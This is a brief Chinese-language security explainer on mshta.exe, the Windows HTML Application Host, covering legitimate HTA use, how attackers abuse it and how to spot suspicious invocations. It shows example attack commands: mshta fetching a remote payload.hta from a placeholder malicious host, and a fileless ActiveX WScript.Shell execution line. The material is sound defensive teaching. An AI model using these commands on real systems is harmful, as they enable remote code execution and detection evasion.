利用微软的 HTML 应用程序宿主程序的攻击
mshta.exe 是微软的 HTML 应用程序宿主程序(Microsoft HTML Application Host),属于 Windows 系统组件。它的核心功能是运行 .hta(HTML Application)文件,允许通过 HTML、JavaScript、VBScript 等技术创建交互式图形界面应用。
何时会调用 mshta.exe?
1. 合法用途
- 运行本地/企业级 HTA 应用:
- 企业可能用
.hta开发内部工具(如配置向导、管理界面)。 - 示例命令:
mshta.exe C:\tools\config.hta
- 企业可能用
- 执行系统脚本:
- 通过命令行调用 JavaScript/VBScript(无需保存为文件)。
- 示例:
mshta.exe "javascript:alert('Hello World');close()"
2. 潜在恶意用途(需警惕)
- 绕过安全防护:
- 攻击者可能通过
mshta.exe执行远程恶意脚本(如下载木马、提权)。 - 示例:
mshta.exe "http://malicious.site/payload.hta"
- 攻击者可能通过
- 无文件攻击:
- 直接在内存中执行代码,不写入磁盘。
- 示例:
mshta.exe "javascript:new ActiveXObject('WScript.Shell').Run('calc.exe')"
- 伪装进程:
- 恶意进程可能命名为
mshta.exe以混淆检测(需检查文件路径是否合法)。
- 恶意进程可能命名为
如何识别可疑行为?
-
检查命令行参数:
- 合法场景通常指向本地
.hta文件或简单脚本。 - 可疑场景可能包含:
- 远程 URL(如
http://、\\192.168.x.x)。 - 长串混淆的 JavaScript/VBScript 代码。
- 敏感命令(如下载文件、启动 PowerShell 等)。
- 远程 URL(如
- 合法场景通常指向本地
-
验证文件路径:
- 合法
mshta.exe路径为C:\Windows\System32\mshta.exe。 - 其他路径(如临时目录)可能是恶意文件。
- 合法
-
监控进程上下文:
- 若
mshta.exe在非交互式场景(如计划任务、启动项)运行,需警惕。
- 若